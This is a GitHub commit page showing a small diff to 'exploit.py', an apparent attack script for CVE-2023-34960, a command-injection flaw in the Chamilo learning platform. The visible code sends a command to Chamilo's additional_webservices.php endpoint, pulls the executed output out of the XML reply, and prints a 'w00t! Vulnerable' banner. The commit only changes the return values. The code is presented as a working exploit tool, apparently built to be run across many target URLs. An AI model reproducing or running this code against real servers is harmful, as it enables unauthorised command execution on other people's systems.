Skip to content

Commit

Permalink
Update exploit.py
Browse files Browse the repository at this point in the history
  • Loading branch information
@ThatNotEasy
ThatNotEasy authored Jul 25, 2023
1 parent f7f4dc9 commit bfd3ab5
Showing 1 changed file with 5 additions and 4 deletions.
9 changes: 5 additions & 4 deletions exploit.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -81,25 +81,26 @@ def chamilo(url, command, user_agents):
r = requests.post(f'{url}/main/webservices/additional_webservices.php', data=body, headers=headers, verify=False, timeout=5)
except Exception as e:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid {Style.RESET_ALL}")
return False
return None

if r.status_code == 200:
try:
pwned = ET.fromstring(r.text)
except ET.ParseError:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid XML Response{Style.RESET_ALL}")
return False
return None

tagged = pwned.find('.//return')
if tagged is not None:
content = tagged.text
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FG}[w00t!] - {FC}Vulnerable: {FW}{content}{Style.RESET_ALL}")
return content
else:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not found on execution. Check manually.{Style.RESET_ALL}")
return None

return content
return None

return False


def main():
Expand Down

0 comments on commit bfd3ab5

Please sign in to comment.